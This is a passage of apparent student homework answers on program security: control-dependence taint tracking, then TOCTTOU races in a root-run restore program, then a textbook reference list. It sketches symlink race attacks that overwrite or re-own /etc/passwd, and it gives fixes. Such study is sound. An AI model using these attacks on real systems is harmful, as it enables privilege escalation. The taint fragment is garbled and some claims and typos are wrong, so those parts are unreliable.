access outside of the document directory, but still allowing access to error logs, etc. ------------------------------------------------------------------------- ------------------------------------------------------------------------- (c) How will your answer to part (a) change if control dependencies are tracked as well? Control dependence taint variables concerns to control flow conditions of the control vairable, i.e., to the case that flow takes place from x to y without assignment involving x and y, but within a conditional x. p tag(p, sizeof(*p)) p (loop) tag(q, sizeof(*q)) q tag(q, sizeof(*q)) *********************************************************************** *********************************************************************** *********************************************************************** 43) RACE CONDITION Consider a program that is used to restore files from a backup. In order that it can restore the files belonging to any user and set the appropriate ownership and permissions on the restored file, the restore program will be run with root privileges. (If it matters, assume that the real uid and saved uid will also be 0.) Assume that the restore program executes the following steps for each file to be restored: 1. read file name f, file content fc, file owner fo, file group fg, and file permission fp from the backup. open, access, stat 2. create file f. create 3. restore its content fc. write(fc, buffer, sizeof(buffer)) 4. set its permission fp. chmod 5. change ownership of file to fo. chowm 6. change group ownership of f to fg. chmod ---------------------------------------------------------------------------- (a) Identify TOCTTOU vulnerabilities in this program. If there are multiple such vulnerabilities, identify them all. Describe an attack against each identified vulnerability: TOCTTOU attacks arise when an application tries to protect itself against name-based attacks. Programmers should always disable signals before entering privileged mode. In this case we have: 1) open, access: To read the file, it needs to access system cal (setuid program). Example: * Mislead privileged programs, steal sensitive information, symlink * AT: create (/tmp/x), US: access (/tmp/x) = ok, AT: unlink(/tmp/x), symlink (/tmp/x -> /etc/passwd), US: open(/tmp/x), overwriting passwd. 2) chmod: Example: * Gain unauthorized access rights to /etc/passwd 3) chown: Example: * Change the ownership of /etc/passwd ------------------------------------------------------------------------- ------------------------------------------------------------------------- (b) For each vulnerability, identify a simple modification to the code that would eliminate the vulnerability. 1) access/open: Access should never be used, use exception handling instead of checking/restore. Access and open should never be called on the same filename. 2) chmod/chown: first open file and then use operations on open files (fchown( ), fstat( ), fchmod( ) system calls). ------------------------------------------------------------------------- ------------------------------------------------------------------------- 1 - The Protection of Information in Computer Systems. 2 - Operating System Concepts, Abraham Silberschatz et al. 3 - Introduction to Computer Security, Matt Bishop. 4 - Security in Computing, Charles P. Pfleeger. 5 - Security Engineering, Ross Anderson. 6 - Grampp and Morris, Unix Operating System Security, 1984. 7 - M. Bellare et all, Provably Fixing the SSH Binary Packet Protocol, 2002. 8 - G. Bard, Vulnerability of SSL to Chosen-Plaintext Attack, 2004. 9 - Matt Bishop, Introduction to Computer Security, Addison Wesley, 2004. 10 - Gene Spafford, Security Myths and Passwords, 2006. 11 - Charles P. Pfleeger, Security in Computing, Prentice-Hall, 2006. 12 - Ross Anderson, Security Engineering, Wiley, 2008. 13 - M. Albrecht, Plaintext Recovery Attacks Against SSH, 2009.